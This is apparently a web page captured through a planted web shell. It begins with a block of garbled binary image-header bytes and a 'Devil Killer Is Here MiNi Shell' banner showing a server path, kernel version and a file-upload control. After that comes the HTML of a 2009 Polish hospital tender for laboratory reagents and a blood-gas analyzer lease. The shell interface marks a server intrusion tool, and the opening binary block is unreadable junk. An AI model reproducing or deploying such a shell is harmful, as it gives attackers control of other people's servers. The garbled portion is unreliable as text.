JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090218/31986-N-2009.html

<p class="kh_header"><b>Nowe Miasto: Produkty farmaceutyczne Odczynniki Laboratoryjne oraz dzierżawa Analizatora zadanie nr. ... . Nr. sprawy ZP, PN/  1  /2009 .Nie otwierać przed dniem  04.03. 2009 r godz. 10 00</b><br>
<b>Numer ogłoszenia: 31986 - 2009; data zamieszczenia: 18.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Tomaszowska 43, 26-420 Nowe Miasto, woj. mazowieckie, tel. 048 6743842, faks 048 6740040.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoz-nowemiasto.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Produkty farmaceutyczne Odczynniki Laboratoryjne oraz dzierżawa Analizatora zadanie nr. ... . Nr. sprawy ZP, PN/  1  /2009 .Nie otwierać przed dniem  04.03. 2009 r godz. 10 00.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem niniejszego postępowania jest zamówienie na zakup  odczynników 
  laboratoryjnych  oraz dzierżawę Analizatora biochemicznego wraz z odczynnikami  
  do laboratorium Samodzielnego Publicznego  Zakładu Opieki Zdrowotnej  w 
  Nowym -Mieście n.P. 
2.Przedmiot zamówienia podzielony został na 10 części. Każda ze wskazanych 
   części  zamówienia określana będzie mianem (zadania).  
1)zadanie nr 1 - Zestawy odczynników, standardów i materiałów kontrolnych do
   oznaczeń biochemicznych metodami manualnymi na spektrofotometrze EPOLL -
   20 oznaczenie wg CPV 33696500-0załącznik nr 4  SIWZ ,
2)zadanie nr 2 - Zestawy odczynników, materiały kontrolne i odczynniki 
  pomocnicze  do oznaczeń hematologicznych na analizatorze  MICROS 45 OT 18 
  oznaczenie wg CPV 33696500-0 załącznik nr  5  SIWZ ,
3)zadanie nr 3 - Odczynniki i kalibratory do oznaczeń biochemicznych na 
   analizatorze ADVIA  1200 oznaczenie wg CPV 33696300-8  załącznik nr  6  SIWZ ,
4)zadanie nr 4 - Płyny systemowe do analizatora biochemicznego ADVIA  1200   
   oznaczenie wg CPV 33696300-8  załącznik nr  7  SIWZ ,
5)zadanie nr 5 - Odczynniki, kalibratory, materiały kontrolne i akcesoria pomocnicze 
   do badań koagulologicznych na koagulometrze K-3002 OPTIC   oznaczenie wg 
   CPV 33696500-0 załącznik nr  8  SIWZ ,
6)zadanie nr 6 - Szybkie testy lateksowe, immunochromatograficzne, serologiczne, 
   testy paskowe i materiały kontrolne do analizy moczu na CLINITEK - 50 
   oznaczenie wg CPV 33696700-0 załącznik nr  9  SIWZ ,
7)zadanie nr 7- Materiały kontrolne do oznaczeń biochemicznych 
   przeprowadzanych na analizatorze ADVIA 1200  oznaczenie wg CPV 33696300-8 
   załącznik nr  10 SIWZ ,
8)zadanie nr 8- Odczynniki chemiczne (barwienie preparatów hematologicznych i 
   cytologii ginekologicznej) oznaczenie wg CPV 33696300-8  załącznik nr 11 SIWZ ,
9)zadanie nr 9-  Serologia grup krwi - odczynniki monoklinalne, surowice i krwinki 
   wzorcowe oznaczenie wg CPV 33696200-7  załącznik nr 12  SIWZ ,
10)zadanie nr  10 -  Odczynniki i materiałów kontrolnych do oznaczeń parametrów 
    równowagi kwasowo-zasadowej wraz z dzierżawą Analizatora oznaczenie wg 
    CPV  33696500-0, 38434500-1 , 51430000  załącznik nr 17 SIWZ. Warunki 
    graniczne załącznik nr 13 SIWZ .Ilość planowanych badań w okresie trwania 
    umowy około 3500 oznaczeń . W ilości testów nie uwzględniono materiałów 
    kontrolnych  ( oblicza wykonawca).Kontrola wewnątrz zakładowa prowadzona 
    będzie dwa razy w tygodniu na dwóch poziomach  (norma i patologia). Rodzaje
    odczynników podaje wykonawca. Termin przydatności minimum 6 miesięcy. 
    Wykonawca zobowiązany będzie do  wypełnienia załącznika nr 17 .
3.Zamawiający dopuszcza składanie rozwiązań równoważnych o parametrach 
   techniczno - eksploatacyjnych użytkowych nie gorszych  niż podane w opisie 
   przedmiotu zamówienia.    Informacje i wymagania związane z dopuszczeniem
   rozwiązań równoważnych  znajdują się w  opisie przedmiotu zamówienia 
   wskazanym w załącznikach  
4.Zamawiający dopuszcza  składanie ofert częściowych na poszczególne zadania. 
   Jednocześnie zastrzega ,że jeden wykonawca może złożyć tylko jedną ofertę 
   częściową obejmującą dowolną liczbę zadań.
5.W trakcie postępowania wykonawcy powinni traktować poszczególne zadania 
   jako oddzielne części-  np. Składając zapytanie ,protest należy wskazać jakiej 
   części  dotyczy. Zamawiający prowadząc   postępowanie będzie dokonywał
   czynności  związanych w postępowaniu wskazując jakiej części   dotyczy.
6.Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia w trakcie 
   realizacji umowy ilościowego zakresu opisanego przedmiotu zamówienia 
   wyszczególnionego w  poszczególnych zadaniach w granicach  + 10 %.
7.W przypadku zmniejszenia  ilości  przedmiotu zamówienia określonego w zadaniu , 
   wykonawcy przysługiwać będzie  wynagrodzenie  wynikające ze zrealizowanych 
   dostaw , natomiast  w przypadku  zwiększenia ilości przedmiotu zamówienia 
   wykonawca otrzyma wynagrodzenie obliczone  po cenach określonych w 
   załączniku, którego dotyczy zwiększona ilość przedmiotu zamówienia.
8.Minimalne - gwarantowane  ilość oraz właściwości odczynników laboratoryjnych
   określone zostały w poszczególnych załącznikach  od nr 4- 12  i 17  SIWZ.
1)Przewidywane ilość odczynników zawartych w załącznikach od 4 - 12 
   oszacowano na podstawie danych zużycia z lat ubiegłych oraz najlepszej wiedzy
   zamawiającego co do potrzeb w okresie realizacji zamówienia.
9.Analizator wraz z odczynnikami laboratoryjnymi  musi spełniać wymagania 
   określone w załączniku  nr 13 (warunki graniczne) oraz załączniku nr 17 SIWZ. 
   Wykonawca zamieści informacje o oferowanym aparacie uwzględniając
   zgodności z cechami podanymi w załączniku nr 13  SIWZ oraz dołączy materiały 
   reklamowe aparatu (rok produkcji,zdjęcia aparatu,dane techniczne ,opis zasady 
   działania  oprogramowanie ,rozmiary, itp.) .Niespełnienie  któregokolwiek
   z parametrów w w/w załączniku spowoduje odrzucenie  oferty. Wykonawca 
   zapewni bezpłatne szkolenie pracowników zamawiającego dot. obsługi aparatu
   oraz dostarczy wraz z aparatem instrukcje obsługi w języku polskim opis 
   odczynników wraz z  kartami charakterystyki substancji niebezpiecznych i 
   preparatu niebezpiecznego zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 3 
   lipca 2002 r (Dz. U. Nr 140,poz.1171 z póź.zm.)Wykonawca zagwarantuje 
   bezpłatne okresowe przeglądy aparatu wraz z częściami zamiennymi w okresie 
   dzierżawy aparatu , tj. trwania umowy.
10.Wykonawca zagwarantuje bezpłatny serwis naprawczy wraz z bezpłatną 
     wymianą części wymiennych w ciągu 24 godzin od zgłoszenie przez 
     zamawiającego przez cały okres trwania umowy. W przypadku awarii aparatu
     podstawowego ,której usunięcie  będzie trwało dłużej niż 48 godzin wykonawca 
     zapewni zamawiającemu aparat zastępczy tego samego typu o identycznych 
     parametrach, co dzierżawiony podstawowy oraz kompatybilny z dostarczonymi 
     odczynnikami w okresie naprawy.
11.Dostawa oraz montaż analizatora w ciągu 10 dni od dnia podpisania umowy.
12.Termin ważności oferowanych odczynników z poszczególnych załączników nie 
     może być  krótszy niż 6 miesięcy od daty ich dostawy nie dotyczy to zadania 
     nr 9 ( załącznik nr 12) ,gdzie termin ważności  powinien wynosić minimum  4 
     tygodnie.
13.W ramach pojedynczego zadania przedmiot zamówienia jest niepodzielny .
14.Zamawiający nie przewiduje zastosowania aukcji elektronicznej ,o której mowa 
    w art.36 ust.2 pkt 7 ustawy.
15.Zamawiający  nie przewiduje zamówień uzupełniających ,o których mowa w art 
    67 ust 1 pkt 7  ustawy oraz    podpisania umowy ramowej. Wartość szacunkowa 
    zmówienia wynosi 227.620,50 PLN..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6, 33.69.63.00-8, 33.69.67.00-2, 33.69.63.00-8, 38.43.45.00-1, 51.43.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się wykonawcy będący osobami 
  fizycznymi, osobami  prawnymi lub jednostkami organizacyjnymi nie posiadającymi 
  osobowości prawnej, a także  wykonawcy Ci występujący wspólnie spełniający 
  warunki określone w art 22 ust 1 pkt 1-4,  ustawy z dnia 29 stycznia 2004 r oraz 
  Specyfikacji Istotnych Warunków Zamówienia szczególności : 
 1) posiadają uprawnienia do wykonywania działalności  lub czynności określonej 
    przedmiotem zamówienia, jeżeli ustawy nakładają posiadania takich uprawnień 
    oraz udokumentują to poprzez wykazanie posiadania  uprawnień do 
    wykonywania działalności związanej z przedmiotem niniejszego zamówienia 
    publicznego,
 2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
    technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią 
    pisemne zobowiązanie innych przedmiotów do udostępnienia potencjału 
    technicznego i osób zdolnych do wykonania zamówienia .
3) znajdują sie w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
    zamówienia -  dokumentując to poprzez przedstawienie polisy ubezpieczeniowej 
    w zakresie działalności związanej z przedmiotem zamówienia,
4) nie podlegają wykluczeniu  z postępowania o udzielenie zamówienia oraz 
    udokumentują to  poprzez złożenie oświadczeń aktualnych
    dokumentów ,informacji potwierdzających, że wykonawca nie podlega 
    wykluczeniu z postępowania o udzielenie zamówienia publicznego .
2.Spełnienie wymaganych warunków , opisanych w  pkt 1 będzie dokonane na 
   podstawie sprawdzenia oferty pod względem formalno prawnym oraz załączonych 
   pod ofertę dokumentów i oświadczeń  , o  których mowa  w pkt.6 niniejszej 
   SIWZ zgodnie z formułą (spełnia-   nie spełnia)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Wraz ze złożoną ofertą wypełnioną na Formularzu ofertowym wg. wzoru 
   określonego w załączniku nr 2 SIWZ należy załączyć:
a)Wypełniony i podpisany Formularz asortymentowo-cenowy wg. wzoru 
   określonego załącznikach nr 1 - 12 i 17 SIWZ,   
b)Oświadczenie Wykonawcy o spełnieniu warunków określonych w art. 22 ust 1 i 
   art. 24 ust 1 i  2  ustawy wg. wzoru określonego w załączniku  nr 1 do SIWZ .
2.W celu potwierdzenia posiadania uprawnień  do wykonywania  działalności 
   określonej przedmiotem zmówienia  lub czynności wykonawcy winni złożyć 
   następujące dokumenty :
a)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do  
   ewidencji o działalności gospodarczej jeżeli odrębne  przepisy wymagają wpisu do 
   rejestru lub zgłoszenia do  ewidencji o działalności  gospodarczej wystawione nie 
   wcześniej niż 6 m-cy  przed upływem    terminu składania ofert;
b)dla przedmiotu oferty kwalifikowanego jako wyrób medyczny :
-oryginał lub kserokopię Rejestru produktu zamówienia i podmiotuodpowiedzialnego
 z za jego wprowadzenie do obrotu wydanego przez Prezesa Urzędu Rejestracji 
 Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych  lub 
 złożenia kserokopii zgłoszenia przedmiotu  zamówienia do Rejestru Wyrobów 
 Medycznych zgodnie z ustawą z dnia 20. 04.2004 r o wyrobach   medycznych 
 (Dz.U. Nr 93, poz. 896 ze zm.)-dotyczy wyrobów sklasyfikowanych w wykazie A i 
  B,- wymagane certyfikaty (dopuszcza się zaświadczenia).
 Na składanych dokumentach należy zaznaczyć  ,której pozycji i zadania dotyczą.
c)oświadczenie , iż dostarczany przedmiot zamówienia spełnia warunki i normy 
   zawarte w ustawie substancjach i preparatach chemicznych   Dz. U. Nr.11 z 
   2001 r z póź. zm.)  jeżeli dotyczy,
d)Pełnomocnictwo osoby podpisującej ofertę do podejmowania zobowiązań w 
   imieniu wykonawcy składającego ofertę , o ile ofertę składa osoba upoważniona 
   przez wykonawcę lub pełnomocnik.  Pełnomocnictwo powinno być złożone w 
   formie oryginału lub kopii sporządzonej notarialnie. 
3.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium 
   Rzeczypospolitej Polskiej, stosuje się do przepisów   zawartych w Rozporządzeniu
   Prezesa Rady Ministrów z dnia 16 października 2008 r w sprawie rodzajów
   dokumentów jakich może żądać zamawiający od  wykonawcy oraz  form w jakich 
   dokumenty mogą  być składane ( Dz. U. Nr 188 poz.1155)- składa: 
- aktualny dokument wystawiony w kraju, w którym ma siedzibę lub miejsce 
   zamieszkania, potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono 
   upadłości: jeśli w kraju  pochodzenia osoby lub w kraju, w którym wykonawca ma
   siedzibę lub miejsce zamieszkania nie wydaje się takiego dokumentu;
- dokument zawierający oświadczenie złożone przed notariuszem,właściwym 
   organem sądowym, administracyjnym albo organem samorządu zawodowego 
   osoby lub kraju, w którym  wykonawca ma siedzibę lub miejsce zamieszkania;   
4.W celu potwierdzenia ,że wykonawca  znajduje się w sytuacji ekonomicznej i 
  finansowej zapewniającej wykonanie zamówienia, zamawiający wymaga złożenia :
a)ważnej kserokopii polisy ubezpieczeniowej , a w przypadku jej braku innego 
   dokumentu  ubezpieczenia potwierdzającego, że wykonawca jest ubezpieczony 
   od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej 
   w tym w zakresie przedmiotu zamówienia.
5.Ponadto oferta powinna zawierać: 
a)oświadczenie o zapewnieniu bezpłatnych przeglądów konserwacyjnych 
   dzierżawionego Analizatora równowagi kwasowo-zasadowej zgodnie z 
   zaleceniami podanymi w instrukcji producenta w okresie trwania umowy  oraz 
   bezpłatną wymianę części zamiennych ,
b)informacje o cechach oferowanego analizatora  uwzględniające zgodność z 
   cechami podanymi w  załączniku nr 13 (warunki graniczne) wraz z danymi 
   technicznymi i opisem zasady działania, 
c)dostarczenie kart charakterystyki odczynników zgodnie z obowiązującą ustawą 
   (dopuszcza się formę elektroniczną po dostawie odczynników)  
6.Dokumenty, są składane w formie  oryginału, wypisu , odpisu lub kopii w języku  
   polskim lub przetłumaczone na język polski, stosownie do obowiązujących 
   przepisów.
7.Kserokopie dokumentów powinny być czytelne i potwierdzone za zgodność z 
   oryginałem przez wykonawcę lub osoby (ę) uprawnione (ą) do składania 
   oświadczeń woli w imieniu wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zoz-nowemiasto.net.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SP ZOZ Nowe-Miasto n.P ul. Tomaszowska 43  Sekcja  po złożeniu wniosku  i wniesieniu opłaty w kwocie 30 zł przelewem na konto Bank Spółdzielczy Belsk Duży 75 9116 0001 0001 4616 2000 0001.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2009 godzina 09:30, miejsce: SP ZOZ Nowe-Miasto n.P ul. Tomaszowska 43 budynek administracyjny (sekretariat) osobiście lub za pomoca poczty lub kuriera..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zestawy odczynników, standardów i materiałów kontrolnych do oznaczeń biochemicznych  metodami manualnymi na spektrofotometrze 
EPOLL - 20.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet ten zawiera odczynniki ,materiały kontrolne do badań metodą manualną Wielkość zamówienia 1.668,24 zł..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6, 33.69.65.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zestawy odczynników, materiały kontrolne i odczynniki pomocnicze  do oznaczeń hematologicznych na analizatorze  MICROS 45 OT 18.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W skład zestawu wchodzą odczynniki płyny myjące i materiały kontrolne. Wielkości zmówienia 
13.409,70 zł..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6, 33.69.65.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Odczynniki i kalibratory do oznaczeń biochemicznych na analizatorze ADVIA  1200.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie  to zawiera odczynniki ,materiały kontrolne do oznaczeń Albuminy ,Białek ,Cholesterolu,Kreatyniny itd. 91.665,86 zł..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6, 33.69.63.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Płyny systemowe do analizatora biochemicznego ADVIA  120.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie to zawiera płyny myjące,chłodzące i inne. Wartość  27.820,95 zł..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6, 33.69.63.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Odczynniki, kalibratory, materiały kontrolne i akcesoria pomocnicze do badań koagulologicznych na koagulometrze K-3002 OPTIC.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie to zawiera zestawy do oznaczeń czasu protrombinowego, aptt, kalibratory i probówki. Wartość zamówienia 7.290,20 zł..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6, 33.69.65.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Szybkie testy lateksowe, immunochromatograficzne, serologiczne, testy paskowe i materiały kontrolne do analizy moczu na CLINITEK - 50.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie to  zawiera zestawy odczynników i materiałów kontrolnych do badań ASO,CRP itd . Wartość zamówienia 20.572,29 zł..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-0, 33.69.67.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Materiały kontrolne do oznaczeń biochemicznych przeprowadzanych na analizatorze ADVIA1200.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wartość zamówienia 7.212,54 zł..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6, 33.69.63.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Odczynniki chemiczne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Barwienie preparatów hematologicznych i cytologii  ginekologicznej. Wartość zamówienia 461,0 zł..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6, 33.69.63.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Serologia grup krwi.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odczynniki monoklinalne, surowice i krwinki wzorcowe . Wartość zamówienia 22.089,64 zł..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6, 33.69.62.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Odczynniki i materiałów kontrolnych do oznaczeń parametrów równowagi kwasowo-zasadowej wraz z dzierżawą Analizatora.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie to  zawiera zestawy kalibrujące, elektrollity . Wartość zamówienia 35.484,08 zł..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6, 38.43.45.00-1, 51.43.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

